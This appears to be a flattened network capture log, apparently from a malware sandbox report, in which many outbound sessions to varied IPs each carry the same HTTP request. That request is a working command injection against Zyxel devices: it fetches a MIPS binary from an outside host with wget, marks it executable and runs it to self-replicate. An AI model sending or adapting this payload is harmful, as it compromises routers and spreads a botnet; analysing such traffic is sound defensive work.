                                                Jan 12, 2024 18:16:21.409523964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4064192.168.2.236075086.82.90.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409574986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4065192.168.2.2360780141.220.118.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409627914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4066192.168.2.2349560186.203.88.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409658909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4067192.168.2.23367624.223.53.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409681082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4068192.168.2.233780835.32.98.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409737110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4069192.168.2.233908491.224.86.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409766912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4070192.168.2.2348542178.117.157.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409822941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4071192.168.2.2345962202.61.166.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409835100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4072192.168.2.234746885.12.64.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409882069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4073192.168.2.234666248.95.167.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409909010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4074192.168.2.235411873.213.199.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409948111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4075192.168.2.2345512166.133.122.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409974098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4076192.168.2.2347432165.66.65.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410011053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4077192.168.2.23379704.78.100.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410043955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4078192.168.2.2354306165.27.228.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410075903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4079192.168.2.2343840136.66.27.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410118103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4080192.168.2.235222049.188.87.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410166979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4081192.168.2.235837486.163.229.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410214901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4082192.168.2.2354614137.31.110.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410249949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4083192.168.2.2339338123.56.126.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410300016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4084192.168.2.2344268201.8.136.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410331964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4085192.168.2.2355274167.44.194.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410381079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4086192.168.2.2356206100.25.123.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410415888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4087192.168.2.2353510152.54.35.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410465002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4088192.168.2.234212823.151.224.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410507917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4089192.168.2.2341472201.57.190.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410554886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4090192.168.2.2359974167.219.55.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410567045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4091192.168.2.2353234146.182.158.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410629034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4092192.168.2.233466882.102.199.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410667896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4093192.168.2.2346962115.41.68.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410689116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4094192.168.2.2352126139.223.105.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410746098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4095192.168.2.2345772120.56.116.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410778999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4096192.168.2.2352224167.57.213.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410813093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4097192.168.2.235277245.164.175.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410849094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4098192.168.2.2357636217.238.193.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410881042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4099192.168.2.2333838102.238.29.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410928965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4100192.168.2.2343424171.172.135.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.410985947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4101192.168.2.2358548197.165.21.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411007881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4102192.168.2.233430639.253.55.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411042929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4103192.168.2.234851872.110.219.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411092043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4104192.168.2.2342622173.61.102.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411117077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4105192.168.2.234708249.35.198.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411185980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4106192.168.2.2341296105.156.252.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411228895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4107192.168.2.233571264.95.204.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411273956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4108192.168.2.234627282.247.210.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411302090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4109192.168.2.235210839.59.239.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411345959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4110192.168.2.23406429.218.6.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411381006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4111192.168.2.235310496.170.38.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411401987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4112192.168.2.2343780209.138.51.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411462069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4113192.168.2.2345202134.17.194.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411506891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4114192.168.2.233891070.238.135.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411560059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4115192.168.2.2348980122.57.127.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411596060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4116192.168.2.2332934206.212.9.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411616087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4117192.168.2.233850241.165.77.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411652088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4118192.168.2.235422685.131.109.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411678076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4119192.168.2.2341332178.26.44.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411716938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4120192.168.2.2334694184.255.199.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411781073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4121192.168.2.2337096159.55.203.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411820889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4122192.168.2.234808075.234.218.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411844015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4123192.168.2.2346702156.0.68.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411884069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4124192.168.2.233944870.3.167.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411923885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4125192.168.2.235105093.189.16.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.411962986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4126192.168.2.2358686149.201.112.82443
                                                TimestampBytes transferredDirectionData
